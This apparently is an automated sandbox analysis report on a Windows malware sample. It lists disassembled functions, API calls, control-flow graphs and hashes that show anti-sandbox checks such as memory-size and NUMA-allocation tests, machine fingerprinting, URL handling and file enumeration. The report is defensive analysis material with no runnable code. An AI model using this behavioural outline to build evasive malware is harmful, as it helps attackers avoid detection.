                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                                • Instruction ID: 09296c0490717566420218e3e72328f127d01a86ac434bbd3c7aa25c8eac9feb
                                • Opcode Fuzzy Hash: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                                • Instruction Fuzzy Hash: 613170B1D082099FCB05CFB889899EFBFBCEF58714F100169E605F7650E6349A408BA5
                                Function 00394BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 394bc0-394bce 2794 394bd0-394bd5 2793->2794 2794->2794 2795 394bd7-394c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 392a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00394BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00394C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00394C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                                • Instruction ID: 8a7d6a641b0e096cf79eebf5dcd3da70bf3e55bf52ca2a3a9dac998865c28d12
                                • Opcode Fuzzy Hash: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                                • Instruction Fuzzy Hash: 49011B71D00218AFDB10DFA8E845B9EBBA8AB18324F00416AF954E7290EB7459058BD4
                                Function 00391030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 391030-391055 GetCurrentProcess VirtualAllocExNuma 2799 39105e-39107b VirtualAlloc 2798->2799 2800 391057-391058 ExitProcess 2798->2800 2801 39107d-391080 2799->2801 2802 391082-391088 2799->2802 2801->2802 2803 39108a-3910ab VirtualFree 2802->2803 2804 3910b1-3910b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                • ExitProcess.KERNEL32 ref: 00391058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                                • Instruction ID: 91e0d5a3d5508656af8e3fbc2c3915dd4a6fbf71f7478b4d903b8c7a5f424f66
                                • Opcode Fuzzy Hash: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                                • Instruction Fuzzy Hash: 6301F471780204BFEB204A656C1EF6B7BADA794B05F208018F708F73C0D9B2E904A664
                                Function 003AEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 3aee90-3aeeb5 call 392930 2808 3aeec9-3aeecd call 396c40 2805->2808 2809 3aeeb7-3aeebf 2805->2809 2812 3aeed2-3aeee8 StrCmpCA 2808->2812 2809->2808 2810 3aeec1-3aeec3 lstrcpy 2809->2810 2810->2808 2813 3aeeea-3aef02 call 392a20 call 392930 2812->2813 2814 3aef11-3aef18 call 392a20 2812->2814 2823 3aef04-3aef0c 2813->2823 2824 3aef45-3aefa0 call 392a20 * 10 2813->2824 2819 3aef20-3aef28 2814->2819 2819->2819 2821 3aef2a-3aef37 call 392930 2819->2821 2821->2824 2830 3aef39 2821->2830 2823->2824 2826 3aef0e-3aef0f 2823->2826 2829 3aef3e-3aef3f lstrcpy 2826->2829 2829->2824 2830->2829
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                                • Instruction ID: c425b5ea538a1cc0520abeefedd45a324ad7f0652d599a4f2ebf2c9ea4764161
                                • Opcode Fuzzy Hash: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                                • Instruction Fuzzy Hash: 1221FF31621606AFCF27BF79D84AA9F37A4EF11300F055428B84ADF252DE30DC248794
                                Function 003910C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 3910c0-3910cb 2887 3910d0-3910dc 2886->2887 2889 3910de-3910f3 GlobalMemoryStatusEx 2887->2889 2890 391112-391114 ExitProcess 2889->2890 2891 3910f5-391106 2889->2891 2892 391108 2891->2892 2893 39111a-39111d 2891->2893 2892->2890 2894 39110a-391110 2892->2894 2894->2890 2894->2893
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                                • Instruction ID: 9b385c6f48681c46c23bde60d4bf7679efdcc65c78e5f80f2798b4ca10fb0634
                                • Opcode Fuzzy Hash: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                                • Instruction Fuzzy Hash: 61F05C701183476BEF516A64DC0E72FF7D8EB10350F100929DE9BE2280E230C840D127
                                Function 003A8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 3a8c88-3a8cc4 StrCmpCA 2897 3a8ccd-3a8ce6 2895->2897 2898 3a8cc6-3a8cc7 ExitProcess 2895->2898 2900 3a8cec-3a8cf1 2897->2900 2901 3a8ee2-3a8eef call 392a20 2897->2901 2902 3a8cf6-3a8cf9 2900->2902 2904 3a8cff 2902->2904 2905 3a8ec3-3a8edc 2902->2905 2907 3a8d5a-3a8d69 lstrlen 2904->2907 2908 3a8dbd-3a8dcb StrCmpCA 2904->2908 2909 3a8ddd-3a8deb StrCmpCA 2904->2909 2910 3a8dfd-3a8e0b StrCmpCA 2904->2910 2911 3a8e1d-3a8e2b StrCmpCA 2904->2911 2912 3a8e3d-3a8e4b StrCmpCA 2904->2912 2913 3a8d30-3a8d3f lstrlen 2904->2913 2914 3a8e56-3a8e64 StrCmpCA 2904->2914 2915 3a8e88-3a8e9a lstrlen 2904->2915 2916 3a8e6f-3a8e7d StrCmpCA 2904->2916 2917 3a8d06-3a8d15 lstrlen 2904->2917 2918 3a8d84-3a8d92 StrCmpCA 2904->2918 2919 3a8da4-3a8db8 StrCmpCA 2904->2919 2905->2901 2945 3a8cf3 2905->2945 2931 3a8d6b-3a8d70 call 392a20 2907->2931 2932 3a8d73-3a8d7f call 392930 2907->2932 2908->2905 2935 3a8dd1-3a8dd8 2908->2935 2909->2905 2936 3a8df1-3a8df8 2909->2936 2910->2905 2920 3a8e11-3a8e18 2910->2920 2911->2905 2921 3a8e31-3a8e38 2911->2921 2912->2905 2922 3a8e4d-3a8e54 2912->2922 2929 3a8d49-3a8d55 call 392930 2913->2929 2930 3a8d41-3a8d46 call 392a20 2913->2930 2914->2905 2925 3a8e66-3a8e6d 2914->2925 2927 3a8e9c-3a8ea1 call 392a20 2915->2927 2928 3a8ea4-3a8eb0 call 392930 2915->2928 2916->2905 2926 3a8e7f-3a8e86 2916->2926 2923 3a8d1f-3a8d2b call 392930 2917->2923 2924 3a8d17-3a8d1c call 392a20 2917->2924 2918->2905 2934 3a8d98-3a8d9f 2918->2934 2919->2905 2920->2905 2921->2905 2922->2905 2954 3a8eb3-3a8eb5 2923->2954 2924->2923 2925->2905 2926->2905 2927->2928 2928->2954 2929->2954 2930->2929 2931->2932 2932->2954 2934->2905 2935->2905 2936->2905 2945->2902 2954->2905 2955 3a8eb7-3a8eb9 2954->2955 2955->2905 2956 3a8ebb-3a8ebd lstrcpy 2955->2956 2956->2905
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                                • Instruction ID: 49e27ab6be9d79dbe844e9ec9b6a8c83e72dba8ea5662480c53fe2cd5f4451f3
                                • Opcode Fuzzy Hash: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                                • Instruction Fuzzy Hash: 74E0922940424AEFC7119FB98C6CD82FBA9EF5A300B450999E6006F650D630FC85D7A6
                                Function 003B2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2957 3b2ad0-3b2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 3b2b44-3b2b59 2957->2958 2959 3b2b24-3b2b36 2957->2959
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 003B2B1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                                • Instruction ID: 325ce86a65605f4903ea1a465e65fe4d29faa76375e27547d0ad693a06032e46
                                • Opcode Fuzzy Hash: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                                • Instruction Fuzzy Hash: 6001D676A44608AFC710CF99EC49BDEF7B8F744B21F00026AFA19E3780D774590487A1
                                Function 0039100E Relevance: 4.5, APIs: 3, Instructions: 32memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                • ExitProcess.KERNEL32 ref: 00391058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                                • Instruction ID: 5fb8650d64a7433bd10965f34c9240f99d74fbe47c1f8b86c63a6a1ab4ea98d3
                                • Opcode Fuzzy Hash: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                                • Instruction Fuzzy Hash: 73E0EC70248345BFE62157A59C8EF167FACAF52B01F144845F205FB0D1D6A5B404EB65

                                Non-executed Functions

                                Function 003A2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                                • lstrlen.KERNEL32(\*.*), ref: 003A240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                                • Instruction ID: 4accb0b2269c2a90400a434b90588b3556c206969f4d8b6ac51be5658c7b14bf
                                • Opcode Fuzzy Hash: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                                • Instruction Fuzzy Hash: 4BA25C31912A16AFCB22AF69DC89EAF77B9EF15700F064168F806E7251DB34DD05CB90
                                Function 003916A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                                • lstrcat.KERNEL32(00000000), ref: 00391776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003917EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003917F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391875
                                • lstrcat.KERNEL32(00000000), ref: 0039187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003918AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
